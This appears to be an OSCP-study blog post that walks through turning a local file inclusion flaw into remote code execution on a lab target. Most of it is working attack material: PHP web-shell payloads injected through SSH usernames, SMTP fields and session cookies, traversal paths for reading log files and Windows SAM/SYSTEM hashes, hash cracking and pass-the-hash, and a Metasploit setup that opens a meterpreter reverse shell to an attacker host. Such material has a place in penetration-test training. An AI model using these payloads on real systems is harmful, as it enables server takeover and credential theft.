RCE with log poisoning Attack Methodologies

log posion
OSCP Study materialAll Blog

Some of the important log files are the following :-

http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/auth 
http://example.com/index.php?page=/var/log/mail
http://example.com/index.php?page=/var/log/httpd/error_log
http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log

It is important to get to know a great method to exploit when a web server essentially suffers from local file inclusion (LFI). Let’s assume we are working on a Metasploitable 2 target and the operating system to run the attack is Kali Linux.

The following steps explain how one can perform this process on Kali Linux:

Open the Kali Linux terminal and connect the target by using SSH service. The following command can be in great use then

 ssh msfadmin@192.168.1.105

Check the permission of auth.log file beforehand using the following command

ls -l /var/log/auth.log

Most of the time the auth.log file appears to have the read-write permission. They should appear like the following

:-rw-r—r—r—syslog adm …...

We can now have access to the file and read all its logs through the following command

: tail -f /var/log/auth.log

We can walk through the logs and check the specific logs of the user named “mfsadmin”.

Now, let’s attempt to connect to the webserver using a counterfeit username. One can use the following command for an invalid login

ssh dadp@192.168.1.105

The permission should now be denied and shown clearly as follows

"Permission denied, please try again."

Then, get back to the auth.log file and ensure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104

"Failed Password for invalid user hacker from 192.168.1.104 port 56566 ssh2"

This means that a login whether a passed one or an invalid one, it will get recorded and shown inside the logs. Then, let’s now try passing a PHP code as an invalid user and see how the reaction of such deed will be. The following command provides a PHP invalid user login attempt.

ssh ‘<?php system($_GET[‘c’]); ?>’@192.168.1.105

Then, get back again to the auth.log file and make sure whether such fake or invalid attempt has been recorded or not. It should show that such invalid user tried to get access. The following should display if the user used the IP address of 192.18.1.104

“Failed Password for invalid user <?php system($_GET[‘c’]); ?> from 192.168.1.104 port 49642 ssh2”

Let’s assume that you have previously created LFI and now we try to browse to it using the following link:

192.168.1.105/lfi/lfi.php

An error will appear looking like local file inclusion vulnerability.

The auth.log file should get included as a parameter now through the following URL inside the browser:

192.168.1.105/lfi/lfi.php?file=/var/log/auth.log

Note that a warning will display, with the following text:

“Warning cannot execute a blank command or log entry contains the ssh username with <?php system($_GET[‘c’]); ?> with ssh failed etc.”

Let’s discuss what this actually means. The PHP code which previously contained the CMD comment has already been injected. Any command can then get sent as a parameter now.

Let’s now browse into

"192.168.1.105/lfi/lfi.php?file=/var/log/auth.log&c=ps" 

this will dump the data of auth.log besides executing a comment given through cmd

Let’s now browse into "192.168.1.105/lfi/lfi.php file=/var/log/auth.log&c=pwd".  

This way, the results can display inside the window

Log Poisoning via Mail

As the logs tell us, the server is running Postfix and also has port 25 SMTP open, which was found from a basic Nmap scan. Now our goal is to inject PHP into the logs causing the PHP to render onto your web browser, once you refresh the page with the LFI vulnerability. Sending the phpinfo syntax is a great initial test, but our end goal will be to send this:

<?php echo system($_GET["cmd"]); ?>

So how can we get this PHP string into the postfix mail.log? By default, Postfix includes dates, email addresses, and some other basic data. Fire up emails, mutt or telnet to send the victim server mail. Also, using SMTP-user-enum on Kali may be a wise option to check for valid users – as long as VRFY isn’t disabled while postfix configs.

If you were thorough, you’ll notice the mail log includes the text of the mail subject. This is just perfect – now we can have PHP process any arbitrary code we mail it.

SMTP command flow via telnet may look something like this.

telnet 192.168.1.107 25

Now let’s try to send a mail via command line (CLI) of this machine and send the OS commands via the “RCPT TO” option. Since the mail.log file generates a log for every mail when we try to connect with the webserver. Taking advantage of this feature now I will send malicious PHP code as the fake user and it will get added automatically in the mail.log file as a new log.

MAIL FROM:<jaimatadi@gmail.com>
RCPT TO:<?php system($_GET['c']); ?> 

As our goal is to inject PHP code into the logs and this stage is called logfile poisoning and we can clearly see that details of mail.log, as well as execute comment given through cmd; now execute ifconfig as cmd comment to verify network interface and confirm its result from inside the given screenshot.

192.168.1.107/xyz/lfi.php?file=/var/log/mail.log&c=ifconfig

In some cases, you can also send the email with the mail command line.

mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null

LFI to RCE via PHP sessions

Check if the website uses PHP Session (PHPSESSID)

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly

In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files

/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

Set the cookie to <?php system('cat /etc/passwd');?>

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

Use the LFI to include the PHP session file

login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27

LFI to RCE via phpinfo()

PHPinfo() displays the content of any variables such as $_GET$_POST and $_FILES.

By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name.

Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)

Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf

LFI to RCE via credentials files

This method requires high privileges inside the application in order to read the sensitive files.

Windows version

First extract sam and system files.

http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
http://example.com/index.php?page=../../../../../../WINDOWS/repair/system

Then extract hashes from these files samdump2 SYSTEM SAM > hashes.txt, and crack them with hashcat/john or replay them using the Pass The Hash technique.

Execute following command inside Metasploit:






use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)> set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set lport 8888
msf exploit (web_delivery)>exploit

2 thoughts on “RCE with log poisoning Attack Methodologies

  1. Wow, that’s what I was searching for, what a data!
    existing here at this webpage, thanks admin of this site.

Leave a Reply

Your email address will not be published. Required fields are marked *